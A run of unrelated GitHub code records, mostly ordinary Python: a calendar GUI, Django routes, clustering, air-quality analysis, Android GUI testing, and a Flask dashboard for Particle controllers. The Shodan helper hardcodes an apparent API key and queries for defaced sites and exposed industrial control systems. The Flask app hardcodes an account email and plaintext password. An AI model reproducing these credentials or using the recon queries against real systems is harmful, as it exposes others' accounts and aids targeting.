starttime.strftime('%H:%M'), endtime.strftime('%H:%M'))\r\n new_event = eventManager(starttime, endtime, txt)\r\n today_text.addEvent(new_event)\r\n break\r\n print('event updated')\r\n self.after(60000, self.eventUpdate)\r\n\r\nclass eventManager:\r\n def __init__(self, st, et, txt):\r\n self.start = st\r\n self.end = et\r\n self.txt = txt\r\n \r\n def __eq__(self, other):\r\n return self.start == other.start\r\n \r\n def __ne__(self, other):\r\n return not (self == other)\r\n \r\n def __lt__(self, other):\r\n return self.start < other.start\r\n\r\nclass textManager:\r\n def __init__(self, day, text_color, foreground_color):\r\n self.events = []\r\n self.today = day\r\n self.tc = text_color[0]\r\n self.__text_color = text_color # [w/ events, w/o events]\r\n self.__foreground_color = foreground_color\r\n\r\n def addEvent(self, ev):\r\n self.events.append(ev)\r\n if ev.end.date() >= datetime.datetime.now().date():\r\n self.tc = self.__text_color[1]\r\n\r\n def clearEvent(self):\r\n self.events = []\r\n self.tc = self.__text_color[0]\r\n \r\n def getText(self):\r\n self.events.sort()\r\n rtn = str(self.today.day)+'\\n'\r\n for e in self.events:\r\n rtn += e.txt\r\n return rtn\r\n\r\n def getColor(self):\r\n if self.today == datetime.datetime.now().date():\r\n return (self.tc, self.__foreground_color[0])\r\n return (self.tc, self.__foreground_color[1])\r\n \r\n\r\nclass todoFrame(customtkinter.CTkFrame):\r\n def __init__(self, master, **kwargs):\r\n super().__init__(master, **kwargs)\r\n\r\nclass App(customtkinter.CTk):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n customtkinter.set_appearance_mode(\"dark\") # Modes: \"System\" (standard), \"Dark\", \"Light\"\r\n customtkinter.set_default_color_theme(\"dark-blue\") # Themes: \"blue\" (standard), \"green\", \"dark-blue\"\r\n\r\n # configure window\r\n self.title(\"iCal\")\r\n self.geometry(f\"{1920}x{1080}\")\r\n self.attributes('-fullscreen', False)\r\n\r\n self.grid_rowconfigure(1,weight = 2)\r\n self.grid_columnconfigure(0,weight=1)\r\n\r\n self.clock_frame = clockFrame(master = self)\r\n self.clock_frame.grid(row=0,columnspan=2,sticky='new')\r\n\r\n self.calendar_frame = calendarFrame(master = self,)\r\n self.calendar_frame.grid(row=1,column=0,sticky='nsew')\r\n\r\n #self.todo_list_frame = todoFrame(master = self)\r\n #self.todo_list_frame.grid(row=1,column=1,sticky='nse')\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = App()\r\n app.mainloop()","repo_name":"signindex/iCal-python","sub_path":"ical-python.py","file_name":"ical-python.py","file_ext":"py","file_size_in_byte":7686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6891837091","text":"from django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\n\nfrom documents.views import ListPersonalized, ListPersonalizedSet, \\\n Resumen, Document_create, Detalle_doc, Create_value, Active_off, Document_list, Document_list_filter, Document_edit, Edit_value, prints\n\nurlpatterns = [\n url(r'^$', login_required(Resumen),name='home'),\n url(r'^nuevo$',login_required(Document_create),name='document_form'),\n url(r'^new/(?P\\w+)$',login_required(Create_value),name='create_value'),\n url(r'^editar/(?P\\w+)/(?P\\d+)$',login_required(Edit_value),name='edit_value'),\n url(r'^active_off/(?P\\w+)/(?P\\d+)$',login_required(Active_off), name='active_off'),\n url(r'^list/$', login_required(Document_list), name=\"documento_list\"),\n url(r'^list/personalized/$', login_required(ListPersonalized.as_view()), name=\"documento_personalized\"),\n url(r'^list/personalized/(?P\\w+)/(?P\\w+)/(?P\\w+)/(?P\\w+)/(?P\\w+)/$', login_required(ListPersonalizedSet.as_view()), name=\"documento_personalized_sel\"),\n url(r'^list/(?P\\w+)/$', login_required(Document_list_filter), name=\"documento_list_filter\"),\n url(r'^detalle/(?P\\d+)$', login_required(Detalle_doc), name=\"documento_detalle\"),\n url(r'^editar/(?P\\d+)$', login_required(Document_edit), name=\"documento_edit\"),\n url(r'^resume$', login_required(Resumen), name=\"resume\"),\n url(r'^impreso/(?P\\d+)$', login_required(prints), name=\"documento_impreso\"),\n# url(r'^export/(?P\\d+)/(?P\\w+)$', login_required(ExportView.as_view()), name=\"documento_export\"),\n ]","repo_name":"otonelunico/corpcolina","sub_path":"documents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2804425221","text":"from shodan import Shodan, APIError\r\nimport file_utilty\r\nimport time_utility\r\n\r\n#globals\r\napi = Shodan('POm5XT3RZdHVxSawQbn2CVu7IcDYtTrH')\r\nsave_folder = 'shodanResults' \r\n\r\nempty_shodan = {\r\n \"region_code\": None,\r\n \"tags\": [\r\n ],\r\n \"ip\": \"999.999.999\",\r\n \"area_code\": None,\r\n \"domains\": [],\r\n \"hostnames\": [],\r\n \"postal_code\": None,\r\n \"dma_code\": None,\r\n \"country_code\": None,\r\n \"org\": None,\r\n \"data\": [],\r\n \"asn\": None,\r\n \"city\": None,\r\n \"latitude\": None,\r\n \"isp\": None,\r\n \"longitude\": None,\r\n \"last_update\": None,\r\n \"country_code3\": None,\r\n \"country_name\": None,\r\n \"ip_str\": None,\r\n \"os\": None,\r\n \"ports\": []\r\n}\r\n\r\n# Lookup an IP\r\ndef query_shodan_with_ip(log_file, ip='8.8.8.8'):\r\n try:\r\n ipinfo = api.host(ip)\r\n file_utilty.write_json_to_file(str(time_utility.filetimestamp()+'-'+ip+'-shodan.json'),save_folder,ipinfo)\r\n return ipinfo\r\n except APIError as e:\r\n return empty_shodan\r\n except Exception as e:\r\n print(f'ERROR IN shodanmanager.ipInfo(): {e}: error type: {type(e)}')\r\n file_utilty.write_shodan_log(log_file, 'shodanmanager.query_shodan_with_ip()', e)\r\n return empty_shodan\r\n\r\n\r\ndef hacked_sites():\r\n # Search for websites that have been \"hacked\"\r\n for banner in api.search_cursor('http.title:\"hacked by\"'):\r\n print(banner)\r\n\r\ndef count_industrial_control_systems():\r\n # Get the total number of industrial control systems services on the Internet\r\n ics_services = api.count('tag:ics')\r\n print('Industrial Control Systems: {}'.format(ics_services['total']))","repo_name":"th33nj0y3r/data-collector","sub_path":"shodanmanager.py","file_name":"shodanmanager.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28028627936","text":"#author: Sushma and Krishna\r\n#This program is for K-mean clustering of speed data on basis of latitude and longitude .\r\n#The cluster of speed is mapped to cluster in the location database to longitude and latitude.\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np,pandas as pd\r\nfrom sklearn.cluster import MiniBatchKMeans\r\nfrom sklearn.cluster import DBSCAN,k_means\r\ndata=pd.read_csv('train_with_weather.csv')\r\nsl=pd.read_csv('speed_limit.csv')\r\ntest=pd.read_csv('test_with_weather.csv')\r\ncoordinates_1=(data[['pickup_longitude','pickup_latitude']])\r\ncoordinates_2=(sl[['longitude','latitude']])\r\ncoordinates_22 = coordinates_2.rename(index=str, columns={\"longitude\":\"pickup_longitude\",\"latitude\":\"pickup_latitude\"})\r\nprint(coordinates_1.info())\r\nprint(coordinates_22.info())\r\nframes = [coordinates_22,coordinates_1]\r\n\r\ncoordinates_111 = pd.concat(frames)\r\n\r\ncoordinates = coordinates_111\r\n\r\n\r\n#number of cluster 53942\r\nprint(coordinates.info())\r\ncoordinates = coordinates.reindex()\r\ncoordinates_array = np.array(coordinates)\r\n\r\nsample_ind = np.random.permutation(len(coordinates_array))[:500000]\r\n\r\nkmeans = MiniBatchKMeans(n_clusters=21310,init=np.array(coordinates_22),random_state=42).fit(coordinates_array[sample_ind])\r\n\r\nsl.loc[:, 'speed_cluster'] = kmeans.predict(sl[['latitude', 'longitude']])\r\n#sl.loc[:, 'dropoff_cluster'] = kmeans.predict(sl[['latitude', 'dropoff_longitude']])\r\n\r\ncentroid_1 =kmeans.cluster_centers_\r\nlabels_1 = kmeans.labels_\r\ndata.to_csv('train_cluster.csv')\r\ntest.to_csv('test_cluster.csv')\r\nsl.to_csv('sl_cluster.csv')\r\ncentroid=pd.DataFrame(centroid_1)\r\ncentroid.to_csv('centroid1.csv')\r\nlabels=pd.DataFrame(labels_1)\r\nlabels.to_csv('labels1.csv')\r\nprint(centroid)\r\nprint(labels)\r\n\r\n\r\n\r\n'''sample_ind = np.random.permutation(len(np.array(coordinates)))[:50000]\r\nkmeans = MiniBatchKMeans(n_clusters=53942, batch_size=10000).fit(coordinates[sample_ind])\r\n\r\n\r\nsl.loc[:, 'speed_cluster'] = kmeans.predict(sl[['latitude', 'longitude']])\r\n#sl.loc[:, 'dropoff_cluster'] = kmeans.predict(sl[['latitude', 'dropoff_longitude']])'''\r\n","repo_name":"kaggle3/nyc_taxi_challenge_kaggle","sub_path":"cluster_kmeans.py","file_name":"cluster_kmeans.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12998446439","text":"from socket import *\r\nserverName = 'localHost'\r\nserverPort = 12000\r\n\r\nclientSocket = socket(AF_INET, SOCK_STREAM)\r\nclientSocket.connect((serverName, serverPort))\r\n\r\ndef send(msg):\r\n message = msg.encode()\r\n message_length = len(message)\r\n send_length= str(message_length).encode()\r\n clientSocket.send(send_length)\r\n clientSocket.send(message)\r\n \r\nn = int(input('banyaknya anggota kelompok: '));\r\nfor i in range(n):\r\n message = input('input Nama(spasi)NIM: ')\r\n \r\n send(message)\r\n\r\n # menerima pesan dari server\r\n modifiedMessage = clientSocket.recv(2048)\r\n print(modifiedMessage.decode())\r\n \r\nsend('DC') ## disconnect a connection\r\nclientSocket.close()\r\n","repo_name":"robertsetiawan/Socket_TCP","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30934990019","text":"\n\"\"\"\n 文件名: main.py\n 功能: 主程序\n\n 实战案例1-1:中国五大城市PM2.5数据分析 (1)\n 任务:\n - 五城市污染状态\n - 五城市每个区空气质量的月度差异\n\n 数据集来源:https://www.kaggle.com/uciml/pm25-data-for-five-chinese-cities\n\n 案例文档:readme.pdf\n\"\"\"\n\nimport csv\nimport os\nimport numpy as np\nimport study_numpy.config\n\n\ndef load_data(data_file, usecols):\n \"\"\"\n 参数:\n - data_file: 文件路径\n - usecols: 所使用的列\n 返回:\n - data_arr: 数据的多维数组表示\n \"\"\"\n data = []\n with open(data_file, 'r') as csvfile:\n data_reader = csv.DictReader(csvfile)\n print(data_reader)\n # === Step 2. 数据处理 ===\n for row in data_reader:\n # 取出每行数据,组合为一个列表放入数据列表中\n row_data = []\n # 注意csv模块读入的数据全部为字符串类型\n for col in usecols:\n str_val = row[col]\n # 数据类型转换为float,如果是'NA',则返回nan\n row_data.append(float(str_val) if str_val != 'NA' else np.nan)\n # 如果行数据中不包含nan才保存该行记录\n if not any(np.isnan(row_data)):\n data.append(row_data)\n\n # 将data转换为ndarray\n data_arr = np.array(data)\n return data_arr\n\n\ndef get_polluted_perc(data_arr):\n \"\"\" 获取污染占比的小时数\n 规则:\n 重度污染(heavy) PM2.5 > 150\n 中度污染(medium) 75 < PM2.5 <= 150\n 轻度污染(light) 35 < PM2.5 <= 75\n 优良空气(good) PM2.5 <= 35\n 参数:\n - data_arr: 数据的多维数组表示\n 返回:\n - polluted_perc_list: 污染小时数百分比列表\n \"\"\"\n # 将每个区的PM值平均后作为该城市小时的PM值\n # 按行取平均值\n hour_val = np.mean(data_arr[:, 2:], axis=1)\n # 总小时数\n n_hours = hour_val.shape[0]\n # 重度污染小时数\n n_heavy_hours = hour_val[hour_val > 150].shape[0]\n # 中度污染小时数\n n_medium_hours = hour_val[(hour_val > 75) & (hour_val <= 150)].shape[0]\n # 轻度污染小时数\n n_light_hours = hour_val[(hour_val > 35) & (hour_val <= 75)].shape[0]\n # 优良空气小时数\n n_good_hours = hour_val[hour_val <= 35].shape[0]\n polluted_perc_list = [n_heavy_hours / n_hours, n_medium_hours / n_hours,\n n_light_hours / n_hours, n_good_hours / n_hours]\n return polluted_perc_list\n\n\ndef get_avg_pm_per_month(data_arr):\n \"\"\"\n 获取每个区每月的平均PM值\n 参数:\n - data_arr: 数据的多维数组表示\n 返回:\n - results_arr: 多维数组结果\n \"\"\"\n results = []\n # 获取年份\n years = np.unique(data_arr[:, 0])\n for year in years:\n # 获取当前年份数据\n year_data_arr = data_arr[data_arr[:, 0] == year]\n # 获取数据的月份\n month_list = np.unique(year_data_arr[:, 1])\n\n for month in month_list:\n # 获取月份的所有数据\n month_data_arr = year_data_arr[year_data_arr[:, 1] == month]\n # 计算当前月份PM的均值\n mean_vals = np.mean(month_data_arr[:, 2:], axis=0).tolist()\n\n # 格式化字符串\n row_data = ['{:.0f}-{:02.0f}'.format(year, month)] + mean_vals\n results.append(row_data)\n results_arr = np.array(results)\n return results_arr\n\n\ndef save_stats_to_csv(results_arr, save_file, headers):\n \"\"\"\n 将统计结果保存至csv文件中\n 参数:\n - results_arr: 多维数组结果\n - save_file: 文件保存路径\n - headers: csv表头\n \"\"\"\n with open(save_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(headers)\n for row in results_arr.tolist():\n writer.writerow(row)\n\n\ndef main():\n \"\"\"\n 主函数\n \"\"\"\n polluted_state_list = []\n\n for city_name, (filename, cols) in study_numpy.config.data_config_dict.items():\n # === Step 1+2. 数据获取 + 数据处理 ===\n data_file = os.path.join(study_numpy.config.dataset_path, filename)\n usecols = study_numpy.config.common_cols + ['PM_' + col for col in cols]\n data_arr = load_data(data_file, usecols)\n\n print('{}共有{}行有效数据'.format(city_name, data_arr.shape[0]))\n # 预览前10行数据\n print('{}的前10行数据:'.format(city_name))\n print(data_arr[:10])\n\n # === Step 3. 数据分析 ===\n # 五城市污染状态,统计污染小时数的占比\n polluted_perc_list = get_polluted_perc(data_arr)\n polluted_state_list.append([city_name] + polluted_perc_list)\n print('{}的污染小时数百分比{}'.format(city_name, polluted_perc_list))\n\n # 五城市每个区空气质量的月度差异,分析计算每个月,每个区的平均PM值\n results_arr = get_avg_pm_per_month(data_arr)\n print('{}的每月平均PM值预览:'.format(city_name))\n print(results_arr[:10])\n\n # === Step 4. 结果展示 ===\n # 4.1 保存月度统计结果至csv文件\n save_filename = city_name + '_month_stats.csv'\n save_file = os.path.join(study_numpy.config.output_path, save_filename)\n save_stats_to_csv(results_arr, save_file, headers=['month'] + cols)\n print('月度统计结果已保存至{}'.format(save_file))\n print()\n # 4.2 污染状态结果保存\n save_file = os.path.join(study_numpy.config.output_path, 'polluted_percentage.csv')\n with open(save_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['city', 'heavy', 'medium', 'light', 'good'])\n for row in polluted_state_list:\n writer.writerow(row)\n print('污染状态结果已保存至{}'.format(save_file))\nif __name__ == '__main__':\n main()\n","repo_name":"ding77/python-numpy","sub_path":"pm2.5_demoes2.py","file_name":"pm2.5_demoes2.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"36134232691","text":"import random\n\nimport uiautomator2 as u2\nimport requests\nfrom util import *\nfrom dynamic_testing.testing_path_planner import PathPlanner\nfrom dynamic_testing.hierachySolver import click_points_Solver, bounds2int\nfrom dynamic_testing.grantPermissonDetector import dialogSolver\nimport subprocess\nfrom datetime import datetime\nfrom uiautomator2 import Direction\nfrom activity_launcher import launch_activity_by_deeplinks, launch_activity_by_deeplink\n\n\ndef random_dfs_explore(d, deviceId, path_planner, timeout=30):\n d_activity, d_package, isLauncher = getActivityPackage(d)\n start_time = datetime.now()\n\n while True:\n path_planner.set_visited(d_activity)\n testing_candidate_bounds_list = []\n # find clickable leaves\n xml = d.dump_hierarchy(compressed=True)\n leaves = click_points_Solver(xml)\n for leaf in leaves:\n bounds = leaf.attrib.get('bounds')\n bounds = bounds2int(bounds)\n class_type = leaf.attrib.get('class')\n # print('click:', class_type)\n d.click((bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2)\n d.sleep(1)\n\n d2_activity, d2_package, isLauncher2 = getActivityPackage(d)\n if d2_activity != d_activity or isLauncher2:\n testing_candidate_bounds_list.append(bounds)\n path_planner.set_visited(d2_activity)\n # d.press('back')\n full_cur_activity = path_planner.get_activity_full_path(d_activity)\n # d.app_start(d_package, full_cur_activity)\n deeplinks, actions, params = path_planner.get_deeplinks_by_package_activity(d_package,\n full_cur_activity)\n status = launch_activity_by_deeplinks(deviceId, deeplinks, actions, params)\n\n cur_time = datetime.now()\n delta = (cur_time - start_time).seconds\n if delta > timeout:\n return\n else:\n if len(testing_candidate_bounds_list) == 0:\n return\n else:\n click_bounds = random.sample(testing_candidate_bounds_list, 1)[0]\n d.click((click_bounds[0] + click_bounds[2]) / 2, (click_bounds[1] + click_bounds[3]) / 2)\n d_activity, d_package, isLauncher = getActivityPackage(d)\n if isLauncher:\n return\n\n\ndef unit_dynamic_testing(deviceId, apk_path, atg_json, deeplinks_json, log_save_path, test_time=600):\n visited_rate = []\n installed1, packageName, mainActivity = installApk(apk_path, device=deviceId, reinstall=False)\n if installed1 != 0:\n print('install ' + apk_path + ' fail.')\n return\n try:\n d = u2.connect(deviceId)\n except requests.exceptions.ConnectionError:\n print('requests.exceptions.ConnectionError')\n return\n\n test_start_time = datetime.now()\n\n # open launcher activity\n d.app_start(packageName)\n d.sleep(3)\n dialogSolver(d)\n # d.swipe_ext(Direction.FORWARD)\n # d.swipe_ext(Direction.BACKWARD)\n path_planner = PathPlanner(packageName, atg_json, deeplinks_json)\n delta = 0\n while delta <= test_time:\n random_dfs_explore(d, deviceId, path_planner, timeout=20)\n print('---------------------- visited rate: ', path_planner.get_visited_rate())\n visited_rate.append(path_planner.get_visited_rate())\n\n while True:\n next_activity = path_planner.pop_next_activity()\n if next_activity is not None:\n # d.app_start(d_package, next_activity)\n deeplinks, actions, params = path_planner.get_deeplinks_by_package_activity(packageName,\n next_activity)\n status = launch_activity_by_deeplinks(deviceId, deeplinks, actions, params)\n if status:\n path_planner.set_visited(next_activity)\n break\n\n else:\n print('no next activity in ATG')\n unvisited = path_planner.get_unvisited_activity_deeplinks()\n if unvisited is None:\n print('no activity, finish')\n print('visited rate:%s' % (path_planner.get_visited_rate()))\n visited_rate.append(path_planner.get_visited_rate())\n path_planner.log_visited_rate(visited_rate, path=log_save_path)\n return\n else:\n for i in unvisited:\n activity, deeplinks, actions, params = i\n status = launch_activity_by_deeplinks(deviceId, deeplinks, actions, params)\n path_planner.set_popped(activity)\n if status:\n path_planner.set_visited(activity)\n break\n\n cur_test_time = datetime.now()\n delta = (cur_test_time - test_start_time).total_seconds()\n\n print('visited rate:%s in %s seconds' % (path_planner.get_visited_rate(), test_time))\n path_planner.log_visited_rate(visited_rate, path=log_save_path)\n return\n\n\nif __name__ == '__main__':\n deviceId = '192.168.57.101'\n # deviceId = 'cb8c90f4'\n apk_path = r'/Users/hhuu0025/PycharmProjects/guidedExplorer/data/repackaged_apks/ez.apk'\n atg_json = r'/Users/hhuu0025/PycharmProjects/guidedExplorer/data/activity_atg/ez.json'\n deeplinks_json = r'/Users/hhuu0025/PycharmProjects/guidedExplorer/data/deeplinks_params.json'\n log = r'/Users/hhuu0025/PycharmProjects/guidedExplorer/data/visited_rate/ez.txt'\n unit_dynamic_testing(deviceId, apk_path, atg_json, deeplinks_json, log)\n","repo_name":"OldTruckDriver/guidedExplore","sub_path":"dynamic_testing/dynamic_GUI_testing.py","file_name":"dynamic_GUI_testing.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15090725838","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO, emit\nimport json\nimport defaults\n\n# Set this variable to \"threading\", \"eventlet\" or \"gevent\" to test the\n# different async modes, or leave it set to None for the application to choose\n# the best option based on installed packages.\nasync_mode = None\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, async_mode=async_mode)\n\nposx, posy = 20, 20 # starting position of graph nodes\n\n@app.route('/')\ndef index():\n\tcontrollers = json.load(open('data/controllers.json'))\n\treturn render_template('controllers.html', controllers=controllers)\n\n\n@app.route('/dashboard')\ndef dashboard():\n\tglobal posx, posy\n\tposx, posy = 20, 20\n\tinputs = []\n\toutputs = []\n\tfor hexid, data in json.load(open('data/controllers.json')).items():\n\t\tif data['type'] == 'Node': # only collect inputs and outputs for Nodes\n\t\t\tname = data['name']\n\t\t\tinputs.append({'hexid': hexid, 'name': name})\n\t\t\toutputs.append({'hexid': hexid, 'name': name, 'port': 'A'})\n\t\t\toutputs.append({'hexid': hexid, 'name': name, 'port': 'B'})\n\t\t\toutputs.append({'hexid': hexid, 'name': name, 'port': 'C'})\n\t\t\toutputs.append({'hexid': hexid, 'name': name, 'port': 'D'})\n\treturn render_template('dashboard.html', async_mode=socketio.async_mode, inputs=inputs, outputs=outputs)\n\n\n@socketio.on('connect')\ndef connect():\n\t#print('Logging in to Particle...')\n\tusername = 'barskey@gmail.com'\n\tpwd = 'CarlyAnn1102'\n\temit('log_response', {'response': 'Connecting to Particle...', 'style': 'warning'})\n\temit('get_token', {'username': username, 'pwd': pwd})\n\n\n@socketio.on('got_devices')\ndef got_devices(msg):\n\tdevices = msg['data']['body']\n\tfor controller in devices:\n\t\tcid = controller['id']\n\t\tcontrollers = json.load(open('data/controllers.json')) # get existing controllers\n\t\thexids = list()\n\t\tcids = set()\n\t\tfor hexid,details in controllers.items():\n\t\t\thexids.append(hexid)\n\t\t\tcids.add(details['cid'])\n\t\tif cid not in cids:\n\t\t\tnew_hex_id = get_next_hexid(hexids)\n\t\t\tcontrollers[new_hex_id] = defaults.CONTROLLER # add to existing controllers\n\t\t\tcontrollers[new_hex_id]['name'] = controller['name']\n\t\t\tcontrollers[new_hex_id]['cid'] = cid\n\t\t\tcontrollers[new_hex_id]['type'] = 'Node' if controller['platform_id'] == 14 else 'Gateway'\n\t\t\twith open('data/controllers.json', 'w') as outfile: # write to file\n\t\t\t\tjson.dump(controllers, outfile)\n\t\t\t# socketio.emit('add_controller, {}')\n\t\t\tprint('Controller id:{0} hexid:{1} added.'.format(cid, new_hex_id))\n\n\n@socketio.on('show_graph')\ndef load_graph():\n\t#print('Logged in.')\n\tdata = json.load(open('data/graph.json'))\n\temit('create_graph', {'data': data})\n\n\n@socketio.on('add_op')\ndef add_op(msg):\n\tcontrollers = json.load(open('data/controllers.json')) # get existing controllers\n\tglobal posx, posy\n\thexid = msg.get('hexid', '')\n\top = None\n\tparam2 = 10 # default if param is not set\n\tif msg['type'] == 'input':\n\t\top = defaults.TRIGGERS[msg['type']]\n\t\top['properties']['title'] = 'Trigger: ' + controllers[hexid]['name']\n\telif msg['type'] in ['interval', 'random', 'timer']:\n\t\top = defaults.TRIGGERS[msg['type']]\n\telif msg['type'] == 'output':\n\t\top = defaults.ACTIONS[msg['type']]\n\t\top['properties']['title'] = controllers[hexid]['name'] + ' > ' + msg['port']\n\t\tparam2 = msg['port']\n\telse:\n\t\tprint(msg['type'], msg)\n\t\treturn\n\top['top'] = posy\n\top['left'] = posx\n\topid = get_next_opid()\n\tupdate_params({\n\t\t'opid': str(opid),\n\t\t'hexid': hexid,\n\t\t'title': op['properties']['title'],\n\t\t'type': msg['type'],\n\t\t'param2': param2\n\t\t})\n\temit('add_to_graph', {'data': op, 'opid': opid})\n\tposx = posx + 20\n\tposy = posy + 20\n\n@socketio.on('clone_op')\ndef clone_op(msg):\n\tparams = json.load(open('data/params.json'))\n\topid = get_next_opid()\n\told_opid = str(msg['opid'])\n\top = msg['op']\n\top['top'] = op['top'] + 10\n\top['left'] = op['left'] + 10\n\tupdate_params({\n\t\t'opid': str(opid),\n\t\t'hexid': params[old_opid]['hexid'],\n\t\t'title': params[old_opid]['title'],\n\t\t'type': params[old_opid]['type'],\n\t\t'param1': params[old_opid]['param1'],\n\t\t'param2': params[old_opid]['param2'],\n\t\t'param3': params[old_opid]['param3']\n\t})\n\temit('add_to_graph', {'data': op, 'opid': opid})\n\n\n\n@socketio.on('update_parameters')\ndef update_params(msg):\n\t# msg = {opid: ##, title: sss, param1: sss, param2: sss, type: sss}\n\topid = str(msg['opid'])\n\tparams = json.load(open('data/params.json'))\n\t# NOTE - all operator types get param1/2/3 set, even if they are not using it, e.g. outputs\n\tparams[opid] = {\n\t\t'hexid': msg.get('hexid'),\n\t\t'title': msg.get('title', 'No Name'),\n\t\t'param1': msg.get('param1', 5), # default to 5s if not set\n\t\t'param2': msg.get('param2', 10), # default to 10s if not set\n\t\t'param3': msg.get('param3', 0), # default to 0s if not set\n\t\t'type': msg.get('type', '') # default to empty string if not set\n\t}\n\twith open('data/params.json', 'w') as outfile:\n\t\tjson.dump(params, outfile)\n\n\n@socketio.on('update_controller')\ndef update_controller(msg):\n\thexid = str(msg['hexid'])\n\tkey = str(msg['key'])\n\tvalue = msg['val']\n\tcontrollers = json.load(open('data/controllers.json'))\n\tif key == 'name':\n\t\tcontrollers[hexid][key] = value\n\t\tprint('set name')\n\telse:\n\t\t# Dont send defaults to controllers for name change only\n\t\tcontrollers[hexid][key] = '1' if value else '0'\n\t\tstrDefaults = hexid + controllers[hexid]['input'] + controllers[hexid]['A'] + controllers[hexid]['B'] + controllers[hexid]['C'] + controllers[hexid]['D']\n\t\temit('send_defaults', {'data': strDefaults, 'cid': controllers[hexid]['cid']})\n\t\temit('log_response', {'response': 'Saved controller settings.', 'style': 'success'})\n\t\tprint('emit send_defaults')\n\twith open('data/controllers.json', 'w') as outfile:\n\t\tjson.dump(controllers, outfile)\n\n\n@socketio.on('get_op_params')\ndef get_params(msg):\n\topid = str(msg['opid'])\n\tcontrollers = json.load(open('data/controllers.json'))\n\tparams = json.load(open('data/params.json'))\n\thexid = params[opid]['hexid']\n\tinfo = []\n\tif params[opid]['type'] == 'interval':\n\t\tinfo.append('This Interval happens continously every ' + str(params[opid]['param1']) + ' seconds.')\n\t\tinfo.append('After every ' + str(params[opid]['param1']) + ' seconds the connected outputs will run.')\n\telif params[opid]['type'] == 'random':\n\t\tinfo.append('This Interval happens continously between ' + str(params[opid]['param1']) + ' and ' + str(params[opid]['param2']) + ' seconds.')\n\t\tinfo.append('The connected actions will run and a new random delay will be used.')\n\telif params[opid]['type'] == 'output':\n\t\tinfo.append('Controller: ' + controllers[hexid]['name'])\n\t\tinfo.append(' Port: ' + str(params[opid]['param2']))\n\telif params[opid]['type'] == 'input':\n\t\tinfo.append('Controller: ' + controllers[hexid]['name'])\n\t\tinfo.append('')\n\temit('show_params', {\n\t\t'params': params[opid],\n\t\t'opid': opid,\n\t\t'info': info\n\t\t}\n\t)\n\n\n@socketio.on('save_graph')\ndef save_to_file(msg):\n\twith open('data/graph.json', 'w') as outfile:\n\t\tjson.dump(msg['data'], outfile)\n\n\n@socketio.on('delete_op_params')\ndef delete_params(msg):\n\topid = str(msg['opid'])\n\tparams = json.load(open('data/params.json'))\n\tif params.get(opid, None) is not None:\n\t\tdel params[opid]\n\t\twith open('data/params.json', 'w') as outfile:\n\t\t\tjson.dump(params, outfile)\n\n\n@socketio.on('clear_data')\ndef clear_data(msg):\n\t#print('Clearing graph.', msg['data'])\n\twith open('data/graph.json', 'w') as outfile:\n\t\tjson.dump(msg['data'], outfile)\n\twith open('data/params.json', 'w') as outfile:\n\t\tjson.dump({}, outfile)\n\n\n# Parse graph json data into json representation of action/event data to send to controllers.\n# See defaults.py for operators/links dict structure.\n# triggers - each trigger sent as JSON:\n# {hexid: ,\n# type: ,\n# params: [],\n# actions: []\n# }\n@socketio.on('parse_graph')\ndef parse_graph_data():\n\tparams = json.load(open('data/params.json'))\n\tdata = json.load(open('data/graph.json'))\n\toperators = data.get('operators', None)\n\tif operators is None:\n\t\treturn\n\tlinks = data.get('links', None)\n\t#print (json.dumps(links, indent=2))\n\n\ttriggers = []\n\n\t# First find all operators of type interval, random or trigger - these are required to trigger other actions.\n\tfor str_id, v in operators.items():\n\t\ttype = v['properties']['class']\n\t\tif type.endswith('interval'):\n\t\t\ttriggers.append({\n\t\t\t\t'opid': str_id,\n\t\t\t\t'hexid': params[str_id]['hexid'],\n\t\t\t\t'type': 'Interval',\n\t\t\t\t'params': [str(params[str_id]['param1'])]\n\t\t\t})\n\t\telif type.endswith('random'):\n\t\t\ttriggers.append({\n\t\t\t\t'opid': str_id,\n\t\t\t\t'hexid': params[str_id]['hexid'],\n\t\t\t\t'type': 'Random',\n\t\t\t\t'params': [str(params[str_id]['param1']), str(params[str_id]['param2'])]\n\t\t\t})\n\t\telif type.endswith('input'):\n\t\t\t# Look for links that come from this trigger.\n\t\t\t# Loop thru links twice to check for h and l connecters.\n\t\t\tfor linkid,link in links.items():\n\t\t\t\tif str(link['fromOperator']) == str_id and link['fromConnector'] == 'h':\n\t\t\t\t\ttriggers.append({\n\t\t\t\t\t\t'opid': str_id,\n\t\t\t\t\t\t'hexid': params[str_id]['hexid'],\n\t\t\t\t\t\t'type': 'Input',\n\t\t\t\t\t\t'params': ['h']\n\t\t\t\t\t})\n\t\t\t\t\tbreak # only append this trigger once\n\t\t\tfor linkid,link in links.items():\n\t\t\t\tif str(link['fromOperator']) == str_id and link['fromConnector'] == 'l':\n\t\t\t\t\ttriggers.append({\n\t\t\t\t\t\t'opid': str_id,\n\t\t\t\t\t\t'hexid': params[str_id]['hexid'],\n\t\t\t\t\t\t'type': 'Input',\n\t\t\t\t\t\t'params': ['l']\n\t\t\t\t\t})\n\t\t\t\t\tbreak # only append this trigger 